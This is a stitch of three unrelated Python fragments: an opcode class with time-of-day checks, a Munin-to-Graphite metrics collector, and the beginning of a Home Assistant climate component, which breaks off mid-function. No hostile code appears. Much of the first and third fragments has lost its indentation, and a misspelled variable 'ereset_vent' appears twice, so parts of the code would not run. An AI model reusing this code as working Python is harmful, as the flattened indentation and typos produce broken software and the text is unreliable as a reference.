return returnValue
time_stamp = datetime.datetime.today()
if ((dow == "*") or
(dow >= time_stamp.weekday())) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((hour == "*") or
(hour >= time_stamp.hour)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((minute == "*") or
(minute >= time_stamp.minute)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((second == "*") or
(second >= time_stamp.second)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
return "CONTINUE"
def verify_tod_ge_code(self, cf_handle, chainObj, parameters, event):
returnValue = "CONTINUE"
dow = parameters[0]
hour = parameters[1]
minute = parameters[2]
second = parameters[3]
reset_event = parameters[4]
reset_flag = parameters[5]
#
# prevent excessive calculations
if event["name"] != "TIME_TICK":
return returnValue
time_stamp = datetime.datetime.today()
if ((dow == "*") or
(dow <= time_stamp.weekday())) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((hour == "*") or
(hour <= time_stamp.hour)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((minute == "*") or
(minute <= time_stamp.minute)) == False:
return self.verify_return_code( cf_handle, ereset_vent, reset_flag)
if ((second == "*") or
(second <= time_stamp.second)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
return "CONTINUE"
    def verify_fn_code(self, cf_handle, chainObj, parameters, event):
        # NOTE(review): exact duplicate of verify_fn_code defined earlier in this
        # class; this second definition silently shadows the first. One copy
        # should be removed.
        reset_event = parameters[1]
        reset_flag = parameters[2]
        verifyFn = parameters[0]
        if verifyFn (cf_handle, chainObj, parameters, event):
            returnValue = "CONTINUE"
        else:
            returnValue = self.verify_return_code( cf_handle, reset_event, reset_flag)
        return returnValue
def assert_not_event_count_code(self, cf_handle, chainObj, parameters, event):
reset_flag = parameters[3]
reset_event = parameters[2]
returnValue = "DISABLE"
if event["name"] == "INIT":
parameters.append(0)
else:
if event["name"] == parameters[0]:
parameters[-1] = parameters[-1] + 1
if parameters[-1] >= int(parameters[1]):
returnValue = self.verify_return_code( cf_handle, reset_event, reset_flag)
return returnValue
def assert_tod_code(self, cf_handle, chainObj, parameters, event):
returnValue = "DISABLE"
dow = parameters[0]
hour = parameters[1]
minute = parameters[2]
second = parameters[3]
reset_event = parameters[4]
reset_flag = parameters[5]
#
# prevent excessive calculations
if event["name"] != "TIME_TICK":
return returnValue
time_stamp = datetime.datetime.today()
if ((dow == time_stamp.weekday()) or
(dow == "*")) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((hour == time_stamp.hour) or
(hour == "*")) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((minute == time_stamp.minute) or
(minute == "*")) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((second == time_stamp.second) or
(second == "*")) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
return "CONTINUE"
def assert_tod_le_code(self, cf_handle, chainObj, parameters, event):
returnValue = "DISABLE"
dow = parameters[0]
hour = parameters[1]
minute = parameters[2]
second = parameters[3]
reset_event = parameters[4]
reset_flag = parameters[5]
#
# prevent excessive calculations
if event["name"] != "TIME_TICK":
return returnValue
time_stamp = datetime.datetime.today()
if ((dow == "*") or
(dow >= time_stamp.weekday())) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((hour == "*") or
(hour >= time_stamp.hour)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((minute == "*") or
(minute >= time_stamp.minute)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((second == "*") or
(second >= time_stamp.second)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
return "CONTINUE"
def assert_tod_ge_code(self, cf_handle, chainObj, parameters, event):
returnValue = "DISABLE"
dow = parameters[0]
hour = parameters[1]
minute = parameters[2]
second = parameters[3]
reset_event = parameters[4]
reset_flag = parameters[5]
#
# prevent excessive calculations
if event["name"] != "TIME_TICK":
return returnValue
time_stamp = datetime.datetime.today()
if ((dow == "*") or
(dow <= time_stamp.weekday())) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((hour == "*") or
(hour <= time_stamp.hour)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((minute == "*") or
(minute <= time_stamp.minute)) == False:
return self.verify_return_code( cf_handle, ereset_vent, reset_flag)
if ((second == "*") or
(second <= time_stamp.second)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
return "CONTINUE"
def assert_fn_code(self, cf_handle, chainObj, parameters, event):
reset_event = parameters[1]
reset_flag = parameters[2]
verifyFn = parameters[0]
if verifyFn (cf_handle, chainObj, parameters, event):
returnValue = "DISABLE"
else:
returnValue = self.verify_return_code( cf_handle, reset_event, reset_flag)
return returnValue
def test_for_duplicate_functions(self):
function_set = set()
for i , item in self.opcodes.items():
if item == None:
raise ValueError("function is not defined opcode "+i)
if item in function_set:
raise ValueError("duplicate opcode functions opcode "+i)
function_set.add(item)
if __name__ == "__main__":
    # Smoke test: build the opcode table and verify no handler is missing or
    # registered twice (raises ValueError on failure).
    print("test core opcodes")
    opcodes = Opcodes()
    opcodes.test_for_duplicate_functions()
    print("test is done")
| |
#!/usr/bin/python
"""Gather Munin statistics and deliver to Carbon for Graphite display."""
import argparse
import ConfigParser
import logging
import logging.handlers
import pickle
import re
import socket
import struct
import sys
import time
import signal
import threading
# Splits a munin-node output line into a "left" key and "right" value token.
RE_LEFTRIGHT = re.compile(r"^(?P<left>\S+)\s+(?P<right>\S+)$")
# Extracts the node name from the munin-node greeting banner.
RE_MUNIN_NODE_NAME = re.compile(r"^# munin node at\s+(?P<nodename>\S+)$")
# One MuninThread per configured host; populated in main().
threads = []
# Global stop flag, set by the SIGTERM/SIGINT handlers and polled by workers.
shutdown = False
class Munin():
    """Munin host object with querying getter functions.

    Opens a TCP session to a munin-node (optionally addressing an indirect
    remote node given as "host:remotenode"), discovers plugins, fetches their
    config and values, and optionally forwards the samples to Carbon using the
    pickle protocol.
    """
    def __init__(self, hostname, thread, port=4949, args=None):
        self.hostname = None
        self.remotenode = None
        self._sock = None
        self._conn = None
        self._carbon_sock = None
        self.hello_string = None
        # When True, the plugin list (and configs) are re-read on the next poll.
        self.reload_plugins = True
        self.plugins = {}
        self.plugins_config = {}
        # "host:remotenode" addresses a node reached through a munin proxy node.
        if ':' in hostname:
            self.hostname, self.remotenode = hostname.split(":", 1)
        else:
            self.hostname = hostname
        self.port = port
        self.args = args
        # Bug fix: args defaults to None, so guard before dereferencing it.
        if self.args is not None and self.args.displayname:
            self.displayname = self.args.displayname.split(".")[0]
        else:
            self.displayname = self.hostname.split(".")[0]
        self.thread = thread
    def go(self):
        """Bootstrap method to start processing host's Munin stats."""
        global shutdown
        self.connect()
        self.update_hostname()
        processing_time = self.process_host_stats()
        interval = int(self.args.interval)
        # interval == 0 means "poll once and exit"; otherwise keep polling
        # until the global shutdown flag is raised by a signal handler.
        while interval != 0 and not shutdown:
            sleep_time = max(interval - processing_time, 0)
            time.sleep(sleep_time)
            self.connect()
            processing_time = self.process_host_stats()
    def update_hostname(self):
        """Updating hostname from connection hello string."""
        if self.args.displayname:
            return
        try:
            node_name = RE_MUNIN_NODE_NAME.search(self.hello_string).group(1)
            self.displayname = node_name.split(".")[0]
        except AttributeError:
            # Banner did not match; keep the name derived in __init__.
            logger.info("Thread %s: Unable to obtain munin node name from: %s",
                        self.thread.name, self.hello_string)
        return
    def connect(self):
        """Initial connection to Munin host."""
        try:
            self._sock = socket.create_connection((self.hostname, self.port), 10)
        except socket.error:
            logger.exception("Thread %s: Unable to connect to Munin host %s, port: %s",
                             self.thread.name, self.hostname, self.port)
            sys.exit(1)
        try:
            self._conn = self._sock.makefile()
            self.hello_string = self._readline()
        except socket.error:
            logger.exception("Thread %s: Unable to communicate to Munin host %s, port: %s",
                             self.thread.name, self.hostname, self.port)
        if self.args.carbon:
            self.connect_carbon()
    def connect_carbon(self):
        """Open the TCP connection to the Carbon pickle endpoint."""
        carbon_host, carbon_port = self.args.carbon.split(":")
        try:
            self._carbon_sock = socket.create_connection((carbon_host, carbon_port), 10)
        except socket.error:
            logger.exception("Thread %s: Unable to connect to Carbon on host %s, port: %s",
                             self.thread.name, carbon_host, carbon_port)
            sys.exit(1)
    def close_connection(self):
        """Close connection to Munin host."""
        self._sock.close()
    def close_carbon_connection(self):
        """Close connection to Carbon host."""
        if self._carbon_sock:
            self._carbon_sock.close()
    def _readline(self):
        """Read one line from Munin output, stripping leading/trailing chars."""
        return self._conn.readline().strip()
    def _iterline(self):
        """Iterator over Munin output (stops at the "." terminator or EOF,
        skipping comment lines)."""
        while True:
            current_line = self._readline()
            logger.debug("Thread %s: Iterating over line: %s", self.thread.name, current_line)
            if not current_line:
                break
            if current_line.startswith("#"):
                continue
            if current_line == ".":
                break
            yield current_line
    def fetch(self, plugin):
        """Fetch plugin's data fields from Munin.

        Returns a dict keyed by multigraph name (None for the default graph),
        each value mapping field name -> raw value string.
        """
        self._sock.sendall("fetch %s\n" % plugin)
        response = {None: {}}
        multigraph = None
        multigraph_prefix = ""
        for current_line in self._iterline():
            if current_line.startswith("multigraph "):
                multigraph = current_line[11:]
                multigraph_prefix = multigraph.rstrip(".") + "."
                response[multigraph] = {}
                continue
            # Some munin plugins have more than one space between key and value.
            try:
                full_key_name, key_value = RE_LEFTRIGHT.search(current_line).group(1, 2)
                key_name = multigraph_prefix + full_key_name.split(".")[0]
                response[multigraph][key_name] = key_value
            except (KeyError, AttributeError):
                logger.info("Thread %s: Plugin %s returned invalid data [%s] for host"
                            " %s\n", self.thread.name, plugin, current_line, self.hostname)
        return response
    def list_plugins(self):
        """Return a list of Munin plugins configured on a node. """
        self._sock.sendall("cap multigraph\n")
        self._readline()  # ignore response
        if self.remotenode:
            logger.info("Thread %s: Asking for plugin list for remote node %s", self.thread.name, self.remotenode)
            self._sock.sendall("list %s\n" % self.remotenode)
        else:
            logger.info("Thread %s: Asking for plugin list for local node %s", self.thread.name, self.hostname)
            self._sock.sendall("list\n")
        plugin_list = self._readline().split(" ")
        if self.args.filter:
            try:
                filteredlist = [plugin for plugin in plugin_list if re.search(self.args.filter, plugin, re.IGNORECASE)]
                plugin_list = filteredlist
            except re.error:
                # Bug fix: the original %-formatted a two-placeholder string
                # with a single argument, raising TypeError inside this handler.
                logger.info("Thread %s: Filter regexp for plugin list is not valid: %s",
                            self.thread.name, self.args.filter)
        # if there is no filter or we have got an re.error, simply return full list
        result_list = []
        for plugin in plugin_list:
            if len(plugin.strip()) > 0:
                result_list.append(plugin)
        return result_list
    def get_config(self, plugin):
        """Get config values for Munin plugin.

        Returns a dict keyed by multigraph name (None for the default graph);
        dotted keys are stored as nested dicts.
        """
        self._sock.sendall("config %s\n" % plugin)
        response = {None: {}}
        multigraph = None
        for current_line in self._iterline():
            if current_line.startswith("multigraph "):
                multigraph = current_line[11:]
                response[multigraph] = {}
                continue
            try:
                key_name, key_value = current_line.split(" ", 1)
            except ValueError:
                # ignore broken plugins that don't return a value at all
                continue
            if "." in key_name:
                # Some keys have periods in them.
                # If so, make their own nested dictionary.
                key_root, key_leaf = key_name.split(".", 1)
                # Bug fix: the presence check must look inside the current
                # multigraph dict; checking the outer `response` re-created the
                # nested dict on every line, discarding earlier leaves.
                if key_root not in response[multigraph]:
                    response[multigraph][key_root] = {}
                response[multigraph][key_root][key_leaf] = key_value
            else:
                response[multigraph][key_name] = key_value
        return response
    def process_host_stats(self):
        """Process Munin node data, potentially sending to Carbon.

        Returns the elapsed wall-clock time in seconds, used by go() to pace
        the polling interval.
        """
        start_timestamp = time.time()
        logger.info("Thread %s: Querying host %s", self.thread.name, self.hostname)
        # to be more efficient, load list of plugins just in case we do not have any
        if self.reload_plugins:
            self.plugins_config = {}
            self.plugins = self.list_plugins()
            self.reload_plugins = False
            logger.debug("Thread %s: Plugin List: %s", self.thread.name, self.plugins)
        epoch_timestamp = int(start_timestamp)
        for current_plugin in self.plugins:
            logger.info("Thread %s: Fetching plugin: %s (Host: %s)",
                        self.thread.name, current_plugin, self.hostname)
            # after (re)load of list of plugins we have to load their configurations too
            if current_plugin not in self.plugins_config:
                self.plugins_config[current_plugin] = self.get_config(current_plugin)
            logger.debug("Thread %s: Plugin Config: %s", self.thread.name, self.plugins_config[current_plugin])
            plugin_data = self.fetch(current_plugin)
            logger.debug("Thread %s: Plugin Data: %s", self.thread.name, plugin_data)
            if self.args.carbon:
                for multigraph in self.plugins_config[current_plugin]:
                    try:
                        self.send_to_carbon(epoch_timestamp,
                                            current_plugin,
                                            self.plugins_config[current_plugin][multigraph],
                                            plugin_data[multigraph])
                    except KeyError:
                        logger.info("Thread %s: Plugin returns invalid data:\n plugin_config: %r host %s.",
                                    self.thread.name, self.plugins_config[current_plugin], self.hostname)
        end_timestamp = time.time() - start_timestamp
        self.close_connection()
        self.close_carbon_connection()
        logger.info("Thread %s: Finished querying host %s (Execution Time: %.2f sec).",
                    self.thread.name, self.hostname, end_timestamp)
        return end_timestamp
    def send_to_carbon(self, timestamp, plugin_name, plugin_config, plugin_data):
        """Send plugin data to Carbon over Pickle format."""
        if self.args.noprefix:
            prefix = ''
        else:
            prefix = "%s." % self.args.prefix
        hostname = self.hostname
        if self.remotenode:
            hostname = self.remotenode
        data_list = []
        logger.info("Creating metric for plugin %s, timestamp: %d",
                    plugin_name, timestamp)
        for data_key in plugin_data:
            try:
                plugin_category = plugin_config["graph_category"]
                metric = "%s%s.%s.%s.%s" % (prefix, self.displayname, plugin_category, plugin_name, data_key)
                value = plugin_data[data_key]
                logger.debug("Creating metric %s, value: %s", metric, value)
                data_list.append((metric, (timestamp, value)))
            except KeyError:
                logger.info("plugin returns invalid data:\n plugin_config: %r host %s.", plugin_config, self.hostname)
        if self.args.noop:
            logger.info("NOOP: Not sending data to Carbon")
            return
        logger.info("Sending plugin %s data to Carbon for host %s.",
                    plugin_name, hostname)
        # Carbon's pickle protocol: 4-byte big-endian length header + payload.
        payload = pickle.dumps(data_list)
        header = struct.pack("!L", len(payload))
        message = header + payload
        try:
            self._carbon_sock.sendall(message)
            logger.info("Finished sending plugin %s data to Carbon for host %s.",
                        plugin_name, self.hostname)
        except socket.error:
            logger.exception("Unable to send data to Carbon")
###
# Custom Threading class, one thread for each host in configuration
###
class MuninThread(threading.Thread):
    """One worker thread per configured Munin host."""
    def __init__(self, params, cmdlineargs):
        threading.Thread.__init__(self)
        self.name = params['host']
        self.shutdown = False
        # Build a per-host Namespace: host-specific settings from the config
        # file override the command-line defaults, option by option.
        merged = argparse.Namespace()
        target = vars(merged)
        for option in vars(cmdlineargs):
            if option in params:
                target[option] = params[option]
            else:
                target[option] = getattr(cmdlineargs, option, None)
        self.munin = Munin(hostname=self.name, args=merged, thread=self)
    def run(self):
        logger.info("Starting thread for %s." % self.name)
        self.munin.go()
        logger.info("Finishing thread for %s." % self.name)
    def dostop(self):
        """Raise the global shutdown flag so every worker loop exits."""
        global shutdown
        logger.info("Thread %s: Got signal to stop." % self.name)
        shutdown = True
    def reload(self):
        """Ask the worker to re-read the plugin list on its next poll."""
        self.munin.reload_plugins = True
        logger.info("Thread %s: Got signal to reload." % self.name)
###
# below are common functions
###
def parse_args():
    """Parse command line arguments and return the resulting Namespace."""
    cli = argparse.ArgumentParser(description="Send Munin statistics to Graphite.")
    cli.add_argument("--config", "-c",
                     action="store",
                     default=False,
                     help="Configuration file with list of hosts and their plugins to fetch.")
    cli.add_argument("--host",
                     action="store",
                     default="localhost",
                     help="Munin host to query for stats. You can specify indirect node after ':', "
                          "i.e. --host localhost:remotenode. Default: %(default)s")
    cli.add_argument("--displayname",
                     default=False,
                     help="If defined, use this as the name to store metrics in Graphite instead of the Munin"
                          " hostname.")
    cli.add_argument("--carbon",
                     action="store",
                     help="Carbon host and Pickle port (ex: localhost:2004).")
    cli.add_argument("--filter",
                     action="store",
                     default='.*',
                     help="Regular expression for selecting only defined subset of received plugins.")
    cli.add_argument("--interval",
                     type=int,
                     default=60,
                     help="Interval (seconds) between polling Munin host for statistics. If set to 0, exit after "
                          "polling once. Default: %(default)s")
    cli.add_argument("--noop",
                     action="store_true",
                     help="Don't actually send Munin data to Carbon. Default: %(default)s")
    cli.add_argument("--noprefix",
                     action="store_true",
                     default=False,
                     help="Do not use a prefix on graphite target's name. Default: %(default)s")
    cli.add_argument("--prefix",
                     action="store",
                     default="servers",
                     help="Prefix used on graphite target's name. Default: %(default)s")
    cli.add_argument("--logtosyslog",
                     action="store_true",
                     help="Log to syslog. No output on the command line.")
    cli.add_argument("--verbose", "-v",
                     choices=[1, 2, 3],
                     default=2,
                     type=int,
                     help="Verbosity level. 1:ERROR, 2:INFO, 3:DEBUG. Default: %(default)d")
    return cli.parse_args()
###
# stop all threads and exit
###
def handler_term(signum=signal.SIGTERM, frame=None):
    """SIGTERM/SIGINT handler: ask every worker thread to stop."""
    global threads
    for worker in threads:
        worker.dostop()
###
# set all threads to reload information about all munin-node's plugins
###
def handler_hup(signum, frame=None):
    """SIGHUP handler: ask every worker to re-read its munin-node plugin list."""
    global threads
    for worker in threads:
        worker.reload()
def read_configuration(configfile):
    """
    Returns list of per-host option dictionaries read from an INI file (empty
    list when the file is missing or unparsable).
    Configuration options follow parameters described as command line options. All parameters are optional except host,
    displayname parameter is built from section name, so it is always presented too.
    Non-existent options are superseded by defaults
    Example:
    [servername]
    host=fqdn[:remotenode]
    port=4949
    carbon=carbonhostfqdn:port
    interval=60
    prefix=prefix for Graphite's target
    noprefix=True|False
    filter=^cpu.*
    @param configfile: full filepath to configuration file
    @rtype : object
    """
    parser = ConfigParser.ConfigParser()
    host_configs = []
    try:
        parser.read(configfile)
        for section in parser.sections():
            entry = dict(parser.items(section))
            # Only sections that name a host are usable; the section name
            # doubles as the Graphite display name.
            if "host" in entry:
                entry["displayname"] = section
                host_configs.append(entry)
    except ConfigParser.Error as e:
        logger.critical("Failed to parse configuration or command line options. Exception was %s. Giving up." % e)
    return host_configs
def main():
    """Entry point: configure logging, spawn one thread per host, then idle
    until every worker finishes or a signal requests shutdown."""
    global threads
    global logger
    args = parse_args()
    # Map --verbose 1/2/3 onto logging levels (default INFO).
    if args.verbose == 1:
        logging_level = logging.ERROR
    elif args.verbose == 3:
        logging_level = logging.DEBUG
    else:
        logging_level = logging.INFO
    #logging.basicConfig(format=LOGGING_FORMAT, level=logging_level)
    logger = logging.getLogger()
    logger.setLevel(logging_level)
    syslog = logging.handlers.SysLogHandler(address='/dev/log')
    stdout = logging.StreamHandler(stream=sys.stdout)
    formatter = logging.Formatter('MUNIN-GRAPHITE: %(levelname)s %(message)s')
    syslog.setFormatter(formatter)
    if args.logtosyslog:
        logger.addHandler(syslog)
    else:
        logger.addHandler(stdout)
    # block for setting handling of signals
    signal.signal(signal.SIGHUP, handler_hup)
    signal.signal(signal.SIGTERM, handler_term)
    signal.signal(signal.SIGINT, handler_term)
    hosts = list()
    if args.config:
        hosts = read_configuration(args.config)
    if not hosts:
        # no file configuration, trying to use commandline arguments only and construct one-item dictionary
        hosts.append({'host': args.host})
    # we have got some items in hosts's list
    for host in hosts:
        logging.info("Going to thread with config %s" % host)
        threads.append(MuninThread(host, args))
    for t in threads:
        t.start()
    # Poll instead of join() so signals keep reaching the main thread.
    while True:
        try:
            # NOTE(review): Thread.isAlive() is the Python 2 spelling; it was
            # removed in Python 3.9 (use is_alive() when porting).
            if not any([t.isAlive() for t in threads]):
                logging.info("All threads finished, exiting.")
                break
            else:
                time.sleep(1)
        except KeyboardInterrupt:
            handler_term()
| |
"""
Provides functionality to interact with climate devices.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/climate/
"""
import logging
import os
from numbers import Number
import voluptuous as vol
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.config import load_yaml_config_file
from homeassistant.util.temperature import convert as convert_temperature
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.config_validation import PLATFORM_SCHEMA # noqa
import homeassistant.helpers.config_validation as cv
from homeassistant.const import (
ATTR_ENTITY_ID, ATTR_TEMPERATURE, STATE_ON, STATE_OFF, STATE_UNKNOWN,
TEMP_CELSIUS)
DOMAIN = "climate"
ENTITY_ID_FORMAT = DOMAIN + ".{}"
# Seconds between entity polls.
SCAN_INTERVAL = 60
# Service names registered by setup().
SERVICE_SET_AWAY_MODE = "set_away_mode"
SERVICE_SET_AUX_HEAT = "set_aux_heat"
SERVICE_SET_TEMPERATURE = "set_temperature"
SERVICE_SET_FAN_MODE = "set_fan_mode"
SERVICE_SET_OPERATION_MODE = "set_operation_mode"
SERVICE_SET_SWING_MODE = "set_swing_mode"
SERVICE_SET_HUMIDITY = "set_humidity"
# Operation states a climate device may report.
STATE_HEAT = "heat"
STATE_COOL = "cool"
STATE_IDLE = "idle"
STATE_AUTO = "auto"
STATE_DRY = "dry"
STATE_FAN_ONLY = "fan_only"
# State-attribute keys exposed by climate entities.
ATTR_CURRENT_TEMPERATURE = "current_temperature"
ATTR_MAX_TEMP = "max_temp"
ATTR_MIN_TEMP = "min_temp"
ATTR_TARGET_TEMP_HIGH = "target_temp_high"
ATTR_TARGET_TEMP_LOW = "target_temp_low"
ATTR_AWAY_MODE = "away_mode"
ATTR_AUX_HEAT = "aux_heat"
ATTR_FAN_MODE = "fan_mode"
ATTR_FAN_LIST = "fan_list"
ATTR_CURRENT_HUMIDITY = "current_humidity"
ATTR_HUMIDITY = "humidity"
ATTR_MAX_HUMIDITY = "max_humidity"
ATTR_MIN_HUMIDITY = "min_humidity"
ATTR_OPERATION_MODE = "operation_mode"
ATTR_OPERATION_LIST = "operation_list"
ATTR_SWING_MODE = "swing_mode"
ATTR_SWING_LIST = "swing_list"
# Attributes whose values are temperatures and therefore need unit conversion
# before being passed to a device (see temperature_set_service in setup()).
CONVERTIBLE_ATTRIBUTE = [
    ATTR_TEMPERATURE,
    ATTR_TARGET_TEMP_LOW,
    ATTR_TARGET_TEMP_HIGH,
]
_LOGGER = logging.getLogger(__name__)
# Voluptuous validation schemas for the services registered below.
SET_AWAY_MODE_SCHEMA = vol.Schema({
    vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
    vol.Required(ATTR_AWAY_MODE): cv.boolean,
})
SET_AUX_HEAT_SCHEMA = vol.Schema({
    vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
    vol.Required(ATTR_AUX_HEAT): cv.boolean,
})
# A single target temperature is mutually exclusive with a high/low range;
# high and low must be supplied together.
SET_TEMPERATURE_SCHEMA = vol.Schema({
    vol.Exclusive(ATTR_TEMPERATURE, 'temperature'): vol.Coerce(float),
    vol.Inclusive(ATTR_TARGET_TEMP_HIGH, 'temperature'): vol.Coerce(float),
    vol.Inclusive(ATTR_TARGET_TEMP_LOW, 'temperature'): vol.Coerce(float),
    vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
    vol.Optional(ATTR_OPERATION_MODE): cv.string,
})
SET_FAN_MODE_SCHEMA = vol.Schema({
    vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
    vol.Required(ATTR_FAN_MODE): cv.string,
})
SET_OPERATION_MODE_SCHEMA = vol.Schema({
    vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
    vol.Required(ATTR_OPERATION_MODE): cv.string,
})
SET_HUMIDITY_SCHEMA = vol.Schema({
    vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
    vol.Required(ATTR_HUMIDITY): vol.Coerce(float),
})
SET_SWING_MODE_SCHEMA = vol.Schema({
    vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
    vol.Required(ATTR_SWING_MODE): cv.string,
})
def set_away_mode(hass, away_mode, entity_id=None):
    """Turn all or specified climate devices away mode on."""
    data = {
        ATTR_AWAY_MODE: away_mode
    }
    # Consistency fix: explicit None check (matching set_humidity,
    # set_operation_mode and set_swing_mode in this module) so falsy-but-given
    # ids are still forwarded.
    if entity_id is not None:
        data[ATTR_ENTITY_ID] = entity_id
    hass.services.call(DOMAIN, SERVICE_SET_AWAY_MODE, data)
def set_aux_heat(hass, aux_heat, entity_id=None):
    """Turn all or specified climate devices auxiliary heater on."""
    data = {
        ATTR_AUX_HEAT: aux_heat
    }
    # Consistency fix: explicit None check (matching set_humidity,
    # set_operation_mode and set_swing_mode in this module).
    if entity_id is not None:
        data[ATTR_ENTITY_ID] = entity_id
    hass.services.call(DOMAIN, SERVICE_SET_AUX_HEAT, data)
# pylint: disable=too-many-arguments
def set_temperature(hass, temperature=None, entity_id=None,
                    target_temp_high=None, target_temp_low=None,
                    operation_mode=None):
    """Set new target temperature."""
    candidate_pairs = [
        (ATTR_TEMPERATURE, temperature),
        (ATTR_TARGET_TEMP_HIGH, target_temp_high),
        (ATTR_TARGET_TEMP_LOW, target_temp_low),
        (ATTR_ENTITY_ID, entity_id),
        (ATTR_OPERATION_MODE, operation_mode),
    ]
    # Only forward the arguments the caller actually supplied.
    kwargs = {key: value for key, value in candidate_pairs if value is not None}
    _LOGGER.debug("set_temperature start data=%s", kwargs)
    hass.services.call(DOMAIN, SERVICE_SET_TEMPERATURE, kwargs)
def set_humidity(hass, humidity, entity_id=None):
    """Set new target humidity."""
    payload = {ATTR_HUMIDITY: humidity}
    if entity_id is not None:
        payload[ATTR_ENTITY_ID] = entity_id
    hass.services.call(DOMAIN, SERVICE_SET_HUMIDITY, payload)
def set_fan_mode(hass, fan, entity_id=None):
    """Set all or specified climate devices fan mode on."""
    data = {ATTR_FAN_MODE: fan}
    # Consistency fix: explicit None check (matching set_humidity,
    # set_operation_mode and set_swing_mode in this module).
    if entity_id is not None:
        data[ATTR_ENTITY_ID] = entity_id
    hass.services.call(DOMAIN, SERVICE_SET_FAN_MODE, data)
def set_operation_mode(hass, operation_mode, entity_id=None):
    """Set new target operation mode."""
    payload = {ATTR_OPERATION_MODE: operation_mode}
    if entity_id is not None:
        payload[ATTR_ENTITY_ID] = entity_id
    hass.services.call(DOMAIN, SERVICE_SET_OPERATION_MODE, payload)
def set_swing_mode(hass, swing_mode, entity_id=None):
    """Set new target swing mode."""
    payload = {ATTR_SWING_MODE: swing_mode}
    if entity_id is not None:
        payload[ATTR_ENTITY_ID] = entity_id
    hass.services.call(DOMAIN, SERVICE_SET_SWING_MODE, payload)
# pylint: disable=too-many-branches
def setup(hass, config):
"""Setup climate devices."""
component = EntityComponent(_LOGGER, DOMAIN, hass, SCAN_INTERVAL)
component.setup(config)
descriptions = load_yaml_config_file(
os.path.join(os.path.dirname(__file__), 'services.yaml'))
def away_mode_set_service(service):
"""Set away mode on target climate devices."""
target_climate = component.extract_from_service(service)
away_mode = service.data.get(ATTR_AWAY_MODE)
if away_mode is None:
_LOGGER.error(
"Received call to %s without attribute %s",
SERVICE_SET_AWAY_MODE, ATTR_AWAY_MODE)
return
for climate in target_climate:
if away_mode:
climate.turn_away_mode_on()
else:
climate.turn_away_mode_off()
if climate.should_poll:
climate.update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_AWAY_MODE, away_mode_set_service,
descriptions.get(SERVICE_SET_AWAY_MODE),
schema=SET_AWAY_MODE_SCHEMA)
def aux_heat_set_service(service):
"""Set auxillary heater on target climate devices."""
target_climate = component.extract_from_service(service)
aux_heat = service.data.get(ATTR_AUX_HEAT)
if aux_heat is None:
_LOGGER.error(
"Received call to %s without attribute %s",
SERVICE_SET_AUX_HEAT, ATTR_AUX_HEAT)
return
for climate in target_climate:
if aux_heat:
climate.turn_aux_heat_on()
else:
climate.turn_aux_heat_off()
if climate.should_poll:
climate.update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_AUX_HEAT, aux_heat_set_service,
descriptions.get(SERVICE_SET_AUX_HEAT),
schema=SET_AUX_HEAT_SCHEMA)
def temperature_set_service(service):
"""Set temperature on the target climate devices."""
target_climate = component.extract_from_service(service)
for climate in target_climate:
kwargs = {}
for value, temp in service.data.items():
if value in CONVERTIBLE_ATTRIBUTE:
kwargs[value] = convert_temperature(
temp,
hass.config.units.temperature_unit,
climate.temperature_unit
)
else:
kwargs[value] = temp
climate.set_temperature(**kwargs)
if climate.should_poll:
climate.update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_TEMPERATURE, temperature_set_service,
descriptions.get(SERVICE_SET_TEMPERATURE),
schema=SET_TEMPERATURE_SCHEMA)
def humidity_set_service(service):
    """Handle the set_humidity service call for the target devices."""
    devices = component.extract_from_service(service)
    humidity = service.data.get(ATTR_HUMIDITY)

    if humidity is None:
        _LOGGER.error(
            "Received call to %s without attribute %s",
            SERVICE_SET_HUMIDITY, ATTR_HUMIDITY)
        return

    for device in devices:
        device.set_humidity(humidity)

        if device.should_poll:
            device.update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_HUMIDITY, humidity_set_service,
descriptions.get(SERVICE_SET_HUMIDITY),
schema=SET_HUMIDITY_SCHEMA)
def fan_mode_set_service(service):
    """Handle the set_fan_mode service call for the target devices."""
    devices = component.extract_from_service(service)
    fan_mode = service.data.get(ATTR_FAN_MODE)

    if fan_mode is None:
        _LOGGER.error(
            "Received call to %s without attribute %s",
            SERVICE_SET_FAN_MODE, ATTR_FAN_MODE)
        return

    for device in devices:
        device.set_fan_mode(fan_mode)

        if device.should_poll:
            device.update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_FAN_MODE, fan_mode_set_service,
descriptions.get(SERVICE_SET_FAN_MODE),
schema=SET_FAN_MODE_SCHEMA)
def operation_set_service(service):
    """Handle the set_operation_mode service call for the target devices."""
    devices = component.extract_from_service(service)
    mode = service.data.get(ATTR_OPERATION_MODE)

    if mode is None:
        _LOGGER.error(
            "Received call to %s without attribute %s",
            SERVICE_SET_OPERATION_MODE, ATTR_OPERATION_MODE)
        return

